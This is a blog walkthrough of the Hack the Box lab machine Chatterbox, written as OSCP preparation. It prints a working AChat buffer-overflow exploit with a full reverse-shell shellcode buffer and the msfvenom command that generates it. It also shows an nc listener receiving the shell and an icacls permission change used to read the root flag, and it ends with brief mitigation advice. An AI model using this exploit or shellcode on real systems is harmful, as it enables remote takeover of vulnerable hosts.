Open in app

Sign in

Write

Sign in

Hack the Box — Chatterbox (5)

CurlS
5 min readJun 19, 2020

--

HTB is a platform which provides a large amount of vulnerable virtual machines. The goal is to find vulnerabilities, elevate privileges and finally to find two flags — a user and a root flag. As I am planning to take the OSCP exam, my focus is to exploit some HTB machines as preparation.

As I tend to remember stuff easier, when writing them down, I decided to summarize the walkthroughs as documentation for later reference or anyone who is interested in this topic.

This is my fifth HTB writeup!

Summary

This box is labeld as medium. Even though I am quite new to HTB machines, Chatterbox as very straightforward and easy to solve compared to some other machines. Having only two ports open to start with, I knew where to set focus. A vulernable version of AChat is running , which allows a malicious attacker to get a reverse shell on the host via a remote buffer overflow. Luckeliy, there is an existing exploit. Once having a first foodhold, it is possible to read the content of the root flag by using icalcs to change the file permissions (possible due to wrong/misconfigured permission settings).

1. Reconnaissance

Enumeration

In order to identifiy vulnerabilities in order to proceed with exploitations, it is necessary to do a little bit of port scanning and to collect as much information as possible about the target network. I start with a Nmap scan to retrieve an overview of open ports and running services.

nmap -A -T4 10.10.10.74 # does not show any open ports
nmap -p- 10.10.10.74 # identifies two open ports 9255 and 9256
nmap -A -p 9255, 9256 10.10.10.74 -oX nmap/scan.xml

-A: Enable OS detection, version detection, script scanning, and traceroute
-T4: Faster execution (default is T3)
-oX: Save output as xml

Scan Result

Nmap Output Result

Open Ports Analysis

Port 9255 and 9256: AChat system

I found this source where this tool still can be downloaded. AChat is a free Windows Communication Tool for local network messenging.

Knowing that AChat is running, the first step is to check if searchsploit finds any exploit that will help me to gain foodhold to the machine.

searchsploit achat
searchsploit -m 36025

2. Gain Access

Achat Python Exploit Code (truncated)

#!/usr/bin/python
# Author KAhara MAnhara
# Achat 0.150 beta7 - Buffer Overflow
# Tested on Windows 7 32bitimport socket
import sys, time# msfvenom -a x86 --platform Windows -p windows/exec CMD=calc.exe -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
#Payload size: 512 bytesbuf =  ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"

....

In the Python script we have a description of the msfvenom payload as a comment, which runs calc.exe when execution is successful. As we need to generate a reverse shell, we change the msfvenom payload to:

msfvenom -a x86 --platform Windows -p windows/shell_reverse_tcp LHOST=10.10.14.18 LPORT=4466 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python

Executing the above command generates a shellcode. This has to be copied into the original exploit code (overwrite buf variable).

Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x58\x68\x34\x42"
buf += b"\x6d\x30\x59\x70\x39\x70\x53\x30\x31\x79\x79\x55\x4c"
buf += b"\x71\x75\x70\x62\x44\x62\x6b\x52\x30\x50\x30\x44\x4b"
buf += b"\x70\x52\x6c\x4c\x62\x6b\x30\x52\x4e\x34\x54\x4b\x73"
buf += b"\x42\x4d\x58\x4a\x6f\x46\x57\x6f\x5a\x6d\x56\x30\x31"
buf += b"\x4b\x4f\x34\x6c\x6f\x4c\x61\x51\x31\x6c\x79\x72\x4e"
buf += b"\x4c\x4b\x70\x35\x71\x76\x6f\x4c\x4d\x4a\x61\x78\x47"
buf += b"\x57\x72\x4a\x52\x72\x32\x50\x57\x62\x6b\x42\x32\x6e"
buf += b"\x30\x34\x4b\x50\x4a\x6f\x4c\x72\x6b\x4e\x6c\x6a\x71"
buf += b"\x42\x58\x58\x63\x4e\x68\x6a\x61\x77\x61\x4e\x71\x64"
buf += b"\x4b\x51\x49\x4b\x70\x49\x71\x66\x73\x64\x4b\x71\x39"
buf += b"\x4e\x38\x67\x73\x4f\x4a\x51\x39\x72\x6b\x70\x34\x34"
buf += b"\x4b\x4b\x51\x39\x46\x70\x31\x49\x6f\x36\x4c\x37\x51"
buf += b"\x58\x4f\x7a\x6d\x7a\x61\x46\x67\x6d\x68\x4b\x30\x71"
buf += b"\x65\x59\x66\x59\x73\x43\x4d\x79\x68\x4d\x6b\x43\x4d"
buf += b"\x6e\x44\x43\x45\x37\x74\x6e\x78\x32\x6b\x42\x38\x4e"
buf += b"\x44\x4a\x61\x56\x73\x63\x36\x52\x6b\x5a\x6c\x50\x4b"
buf += b"\x52\x6b\x61\x48\x6b\x6c\x59\x71\x36\x73\x44\x4b\x5a"
buf += b"\x64\x52\x6b\x69\x71\x5a\x30\x35\x39\x30\x44\x6c\x64"
buf += b"\x4c\x64\x61\x4b\x61\x4b\x6f\x71\x62\x39\x31\x4a\x72"
buf += b"\x31\x49\x6f\x39\x50\x51\x4f\x51\x4f\x51\x4a\x74\x4b"
buf += b"\x4e\x32\x6a\x4b\x42\x6d\x31\x4d\x70\x68\x6c\x73\x4c"
buf += b"\x72\x49\x70\x49\x70\x53\x38\x62\x57\x64\x33\x6e\x52"
buf += b"\x51\x4f\x4e\x74\x63\x38\x4e\x6c\x62\x57\x4c\x66\x6b"
buf += b"\x57\x6b\x4f\x6a\x35\x45\x68\x52\x70\x6d\x31\x6b\x50"
buf += b"\x4b\x50\x4c\x69\x56\x64\x6f\x64\x52\x30\x71\x58\x4d"
buf += b"\x59\x73\x50\x72\x4b\x4d\x30\x69\x6f\x37\x65\x50\x50"
buf += b"\x50\x50\x72\x30\x6e\x70\x61\x30\x62\x30\x6d\x70\x32"
buf += b"\x30\x43\x38\x5a\x4a\x4a\x6f\x37\x6f\x77\x70\x49\x6f"
buf += b"\x59\x45\x52\x77\x30\x6a\x39\x75\x30\x68\x79\x7a\x4b"
buf += b"\x5a\x7a\x6e\x6d\x42\x62\x48\x4b\x52\x6b\x50\x7a\x71"
buf += b"\x62\x52\x45\x39\x6a\x46\x31\x5a\x5a\x70\x6f\x66\x50"
buf += b"\x57\x53\x38\x73\x69\x43\x75\x71\x64\x43\x31\x79\x6f"
buf += b"\x7a\x35\x74\x45\x55\x70\x73\x44\x5a\x6c\x59\x6f\x4e"
buf += b"\x6e\x4b\x58\x54\x35\x6a\x4c\x61\x58\x68\x70\x68\x35"
buf += b"\x46\x42\x51\x46\x49\x6f\x47\x65\x50\x68\x42\x43\x32"
buf += b"\x4d\x63\x34\x49\x70\x52\x69\x58\x63\x70\x57\x61\x47"
buf += b"\x72\x37\x6e\x51\x59\x66\x4f\x7a\x5a\x72\x51\x49\x30"
buf += b"\x56\x58\x62\x79\x6d\x63\x36\x49\x37\x31\x34\x4b\x74"
buf += b"\x4f\x4c\x39\x71\x69\x71\x74\x4d\x4e\x64\x4d\x54\x4c"
buf += b"\x50\x55\x76\x69\x70\x30\x44\x61\x44\x50\x50\x51\x46"
buf += b"\x71\x46\x61\x46\x50\x46\x72\x36\x70\x4e\x70\x56\x30"
buf += b"\x56\x70\x53\x62\x36\x32\x48\x51\x69\x78\x4c\x6f\x4f"
buf += b"\x51\x76\x69\x6f\x6a\x35\x61\x79\x49\x50\x6e\x6e\x62"
buf += b"\x36\x30\x46\x49\x6f\x30\x30\x53\x38\x6c\x48\x52\x67"
buf += b"\x6d\x4d\x43\x30\x79\x6f\x77\x65\x65\x6b\x58\x70\x66"
buf += b"\x55\x63\x72\x71\x46\x33\x38\x47\x36\x46\x35\x67\x4d"
buf += b"\x73\x6d\x49\x6f\x5a\x35\x4d\x6c\x6b\x56\x53\x4c\x4b"
buf += b"\x5a\x71\x70\x4b\x4b\x6b\x30\x63\x45\x59\x75\x55\x6b"
buf += b"\x6f\x57\x6a\x73\x51\x62\x42\x4f\x6f\x7a\x6d\x30\x52"
buf += b"\x33\x69\x6f\x39\x45\x41\x41"

There is one more change to make. The hard-coded IP address has to be adapted to 10.10.10.74.

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (‘10.10.10.74’, 9256)

Now, we can save this Python file, start a listener (as defined in the payload) and execute the modified Python script. The exploit will conduct a Buffer overflow attack.

1. nc -nlvp 4466
2. python 36025.py

The attack is successful, I got a low priv reverse shell (user Alfred).

#nc -nlvp 4466
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::4466
Ncat: Listening on 0.0.0.0:4466
Ncat: Connection from 10.10.10.74.
Ncat: Connection from 10.10.10.74:49158.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.C:\Windows\system32>

Navigating to C:\Users\Alfred\Desktop it is possible to extract the user flag:

c:\Users\Alfred\Desktop>type user.txt
type user.txt
72290....06334

Elavation of Privilege

This step is quiet easy and I am not sure, if this is the intended way to get the root flag.

When checking out the directories we can see, that the user Alfred can traverse the Administrators’ directory. Normally this should not be possible. A quick check on the folder permissions shows:

C:\Users\Administrator\Desktop>icacls C:\Users\Administrator\Desktop
icacls C:\Users\Administrator\Desktop
C:\Users\Administrator\Desktop NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                               CHATTERBOX\Administrator:(I)(OI)(CI)(F)
                               BUILTIN\Administrators:(I)(OI)(CI)(F)
                               CHATTERBOX\Alfred:(I)(OI)(CI)(F)

We can see that Alfred has Full Access to this folder, files and subfolders.

I  - Permission inherited from parent container
OI - Object inherit    - This folder and files. 
CI - Container inherit - This folder and subfolders.
F  - Full Access

The problem is, that the file root.txt has restricted access. But as Alfred has full permission on the directory itself, it is possible to change the file permissions. We can use the following command to grant read permission to Alfred for this file:

icacls Examples

And with that it is possible to get the root flag.

C:\Users\Administrator\Desktop>icacls root.txt /grant Alfred:(R)
icacls root.txt /grant Alfred:(R)
processed file: root.txt
Successfully processed 1 files; Failed processing 0 filesC:\Users\Administrator\Desktop>type root.txt
type root.txt
a673d....dcc7c

Mitigation

The AChat has a remote buffer overflow vulnerability. The service should not be available. If patching is not a solution, an alternative tool shall be evaluated.

Normally, it should not be the case that a user can access the home folder of Administrator. The file permissions should be reviewed and adapted.

Other WriteUps

Hack the Box — Devel (1)
Hack the Box — Servmon (2)
Hack the Box — Jeeves(10)

Links

https://achat.en.softonic.com/

Oscp
Chatterbox
Pentesting
Hackthebox Writeup

--

--

CurlS

Written by CurlS

305 Followers

Working in Infosec. Interested in many things, from technical perspective -> security, ctfs, coding, reverse engineering,… and in general -> love life. She.

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams